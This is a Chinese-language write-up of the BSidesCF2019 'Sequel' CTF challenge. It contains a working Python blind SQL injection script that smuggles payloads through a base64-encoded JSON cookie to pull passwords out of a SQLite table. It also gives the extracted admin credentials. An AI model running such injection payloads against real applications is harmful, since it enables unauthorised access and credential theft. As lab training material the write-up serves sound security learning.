# [BSidesCF2019]Sequel
爆破密码都是 guest
获得启示:Maybe the admin likes it too?
看到有 session 可以试试 jwt,但是就是最简单的 base64
base64 解码
然后就不知道为什么就跳到了 sqlite 上面了
按 wp:
import requests | |
import base64 | |
import string | |
import time | |
url = "http://0eaa6072-56ef-4b36-9ba7-a0e1d673c493.node4.buuoj.cn:81/sequels" | |
flag = '' | |
for x in range(1, 10): | |
print(x) | |
for n in range(1, 40): | |
for i in string.printable: | |
time.sleep(0.1) | |
tmp = flag + i | |
u = r'\" or (substr((select password from userinfo limit {},1),{},1)=\"{}\") or \"'.format( | |
x, n, i) | |
payload = '{"username":"%s","password":"guest"}' % u | |
# print(payload) | |
cookies = {"1337_AUTH": base64.b64encode(payload.encode('utf-8')).decode('utf-8')} | |
res = requests.get(url, cookies=cookies) | |
if "Movie" in res.text: | |
flag = tmp | |
print(flag) | |
break |
# sqlite 注入要点
这个 sqlite_master 就类似于 mysql 的 information_schema
CREATE TABLE sqlite_master ( | |
type TEXT, | |
name TEXT, | |
tbl_name TEXT, | |
rootpage INTEGER, | |
sql TEXT | |
); |
写 exp 的时候,要注意先是要符合一开始的 json 格式,然后把里面的值作为字符串拼接到 sql 语句里,所以是这样的,需要用 \
转义
json
{"username":"\" or 1=1 or \"","password":"guest"} |
账号:sequeladmin
密码:f5ec3af19f0d3679e7d5a148f4ac323d
获取密码登录即可
参考链接:https://syunaht.com/p/3809605982.html